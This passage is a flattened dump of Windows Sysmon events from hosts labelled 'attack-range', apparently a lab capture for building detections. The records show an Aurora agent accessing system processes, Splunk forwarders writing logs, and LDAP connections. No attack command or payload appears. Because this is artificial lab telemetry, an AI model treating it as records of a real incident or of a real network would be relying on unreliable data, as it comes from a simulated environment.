Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000041189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.459{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=885F98AE72623888AD495D3680AB3A18,SHA256=1257B669E22A88661FB62020634537DF1BA7C78F081CF20849EEFC3C498E2FDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.365{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CC217ED82904EA6850AF161700A73D2,SHA256=4130121C83790CE44DC1736039903144103C85D5F40DE30C51CE33090DD0FF41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.261{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.260{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000041185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.178{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015919Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:55.488{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D75794DDAA35A09DC703AB8A474C9113,SHA256=93AAA894119CA8DA5ED0C2FBB70A6CDD667E466E695687CED74FE8A09E155544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:55.876{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D70DDE17ACBA7C1F2498EFAC4895C1F3,SHA256=1B21FD4A13583B947A60C74580CE7C24856C4BA3E470094A0C9BE8B6A8F86F6D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:55.443{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79D491116018890476F2C2BC9C3A284B,SHA256=83652288707AE9521927A27C848D9FD9D2F183DD32C7121903B8D9C700591EE4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015920Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:56.572{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA303F361905360AB59EB91EAE328D8A,SHA256=F65CDF4A12DC6B753002663759A7498C7AEFB14F5FA76514413DBFEE2D0503A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:56.529{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7556D170D3D3F4B0DA4746E76218E073,SHA256=C6B8DC326322236199B0AAD55B963CCA70A884DF9661F04FD505A0B2211E133E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.316{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56271-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000041213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:54.316{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56271-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000015922Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:55.092{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50071-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000015921Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:57.667{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1526E6632202FA2C10A9AF2C0978787,SHA256=854AFB4C93E17D66D72B70A39909F25D208261472B122BCD1823979434260D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:57.619{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9305CA0E5257D0A1F8605161E34BB402,SHA256=CD403FF92471DFCCDA0320704C8E7337C809DC467387B9AD028B2D0F3C4130F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015923Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:58.775{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18754BC93C11B5EB618E89021ED93D87,SHA256=27767D212F575D9CAA3A43152BBB9BA9476DB94AF82C599DD21E3ED6CABBFF3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:58.682{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B093E640E3785CB93A70B222AAF2714,SHA256=4D1932DADA77D5DBD716722FA97483E08E13FB016255545E9701F086EFCC05A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015924Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:59.860{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEFFD94962241FDC0AEE2E41ADD1E8BD,SHA256=17D7C1CB652F3A2E0D355530371B5CC5CA1F5DC7255594AB7C9AACE181382A29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:59.753{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BD3128713B4FE6ECC0C232F5BF8FEA,SHA256=BC6EC9B2438730C1C6DFEE192A7D1D547588F5C822E7EFD87E10B080624E48E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:59.643{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=3A47DB6F7C9FAE0D8187FEEC0A339147,SHA256=55103801A23A006272F9528450CAC89E9AD72D5877DDF78AA47AD7FC25097225,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:57.598{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56272-false10.0.1.12-8000- 23542300x800000000000000015925Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:00.964{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3C4A81B8323E503C831A667162DEC08,SHA256=58700C9AF5BED96586F3C23DDF3DFD8146D09DF0BD94B84AA2461A5EF28B7BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:00.850{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=402FF2B56DE6A34A8CB9C196A9F28DBD,SHA256=CB2562A168298590E7C9597F9E30520428A4F5532D38BC1077C249E58B287CEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:01.936{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4AA4E4CBA944C866BD73424F8DC8EA8,SHA256=366358592CA88C7E7E88C197D079CC9730961886AB3AE5CF86751C01F48BFCFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015926Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:01.466{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=E9B631E6F0623812CFB3F99A1452456F,SHA256=305483267BB6A7E61F8F4860B27E07BB04CB023A790A11793BDC5AF86479BACD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015958Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.797{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015957Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.793{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015956Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.792{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015955Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.783{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015954Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.778{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015953Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.776{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015952Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.775{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015951Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.768{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015950Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.767{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015949Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.763{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015948Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015947Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000015946Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:02.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program 